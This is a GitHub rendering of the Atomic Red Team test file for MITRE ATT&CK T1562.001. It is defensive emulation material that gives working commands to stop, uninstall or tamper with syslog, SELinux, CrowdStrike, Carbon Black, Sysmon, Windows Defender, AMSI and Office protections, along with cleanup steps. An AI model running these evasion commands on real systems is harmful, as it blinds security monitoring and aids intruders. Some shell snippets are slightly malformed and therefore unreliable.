Skip to content

Latest commit

 

History

History
882 lines (478 loc) · 21.9 KB

T1562.001.md

File metadata and controls

882 lines (478 loc) · 21.9 KB

T1562.001 - Disable or Modify Tools

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.

Atomic Tests


Atomic Test #1 - Disable syslog

Disables syslog collection

Supported Platforms: Linux

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service rsyslog stop
  chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop rsyslog
  systemctl disable rsyslog
fi


Atomic Test #2 - Disable Cb Response

Disable the Cb Response service

Supported Platforms: Linux

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi


Atomic Test #3 - Disable SELinux

Disables SELinux enforcement

Supported Platforms: Linux

Attack Commands: Run with sh!

setenforce 0


Atomic Test #4 - Stop Crowdstrike Falcon on Linux

Stop and disable Crowdstrike Falcon on Linux

Supported Platforms: Linux

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service

Cleanup Commands:

sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service


Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macOS

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist

Cleanup Commands:

sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist


Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macOS

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Cleanup Commands:

sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist


Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macOS

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Cleanup Commands:

sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist


Atomic Test #8 - Disable macOS Gatekeeper

Disables macOS Gatekeeper

Supported Platforms: macOS

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo spctl --master-disable

Cleanup Commands:

sudo spctl --master-enable


Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS

Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS

Supported Platforms: macOS

Inputs:

Name Description Type Default Value
falcond_plist The path of the Crowdstrike Falcon plist file path /Library/LaunchDaemons/com.crowdstrike.falcond.plist
userdaemon_plist The path of the Crowdstrike Userdaemon plist file path /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}

Cleanup Commands:

sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}


Atomic Test #10 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
sysmon_driver The name of the Sysmon filter driver (this can change from the default) string SysmonDrv

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

fltmc.exe unload #{sysmon_driver}

Cleanup Commands:

sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon must be downloaded
Check Prereq Commands:
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } 
Get Prereq Commands:
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
Description: sysmon must be Installed
Check Prereq Commands:
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } 
Get Prereq Commands:
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
Description: sysmon filter must be loaded
Check Prereq Commands:
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } 
Get Prereq Commands:
sysmon -u
sysmon -accepteula -i


Atomic Test #11 - Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
sysmon_exe The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) Path PathToAtomicsFolder\T1562.001\bin\sysmon.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sysmon -u

Cleanup Commands:

sysmon -i -accepteula >nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon executable must be available
Check Prereq Commands:
if(cmd /c where sysmon) {exit 0} else {exit 1} 
Get Prereq Commands:
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands:
if(cmd /c sc query sysmon) { exit 0} else { exit 1} 
Get Prereq Commands:
cmd /c sysmon -i -accepteula


Atomic Test #12 - AMSI Bypass - AMSI InitFailed

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Supported Platforms: Windows

Attack Commands: Run with powershell!

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cleanup Commands:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)


Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" to verify that it is gone.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

Cleanup Commands:

New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null


Atomic Test #14 - Disable Arbitrary Security Windows Service

With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
service_name The name of the service to stop String McAfeeDLPAgentService

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled

Cleanup Commands:

sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1


Atomic Test #15 - Tamper with Windows Defender ATP PowerShell

Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1

Cleanup Commands:

Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0


Atomic Test #16 - Tamper with Windows Defender Command Prompt

Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend

Cleanup Commands:

sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1


Atomic Test #17 - Tamper with Windows Defender Registry

Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1

Cleanup Commands:

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0


Atomic Test #18 - Disable Microsoft Office Security Features

Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with powershell!

New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"

Cleanup Commands:

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore


Atomic Test #19 - Remove Windows Defender Definition Files

Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All


Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service

Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
service_name The name of the service to remove String McAfeeDLPAgentService

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}


Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows

Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
falcond_path The Crowdstrike Windows Sensor path. The Guid always changes. path C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}


Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder

Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
excluded_folder This folder will be excluded from scanning String C:\Temp

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath

Cleanup Commands:

$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath


Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension

Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
excluded_exts A list of extension to exclude from scanning string .exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension  $excludedExts

Cleanup Commands:

$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore


Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process

Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
excluded_process A list of processes to exclude from scanning string outlook.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess

Cleanup Commands:

$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess  $excludedProcess